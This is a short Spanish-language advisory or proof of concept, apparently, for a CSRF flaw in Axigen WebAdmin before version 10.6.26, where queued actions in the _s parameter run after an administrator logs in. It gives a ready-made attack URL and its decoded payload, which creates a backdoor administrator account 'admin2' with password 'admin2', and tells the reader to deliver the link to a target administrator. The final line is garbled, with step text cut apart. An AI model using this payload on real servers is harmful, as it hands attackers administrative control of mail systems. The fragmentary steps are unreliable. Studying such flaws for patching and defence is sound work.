
Axigen WebAdmin CSRF Vulnerability
Acciones críticas que cambian el estado en la interfaz Axigen WebAdmin son accesibles mediante solicitudes GET. Si bien el token _h protege contra el CSRF directo, la aplicación procesa solicitudes en cola a través del parámetro _s (breadcrumb) inmediatamente después de que un usuario se autentica.
Un atacante puede crear una URL que contenga una carga útil codificada en Base64 en el parámetro _s. Si un administrador hace clic en este enlace y completa el proceso de inicio de sesión, la acción en cola se ejecuta automáticamente en su contexto.
Versiones afectadas: < 10.6.26
Para más información, consulta la Base de conocimientos de Axigen.
URL objetivo:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
Carga útil decodificada (parámetro _s):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s en la URL de ataque y entrégala a un administrador objetivo.admin2 (o se ejecuta tu acción personalizada).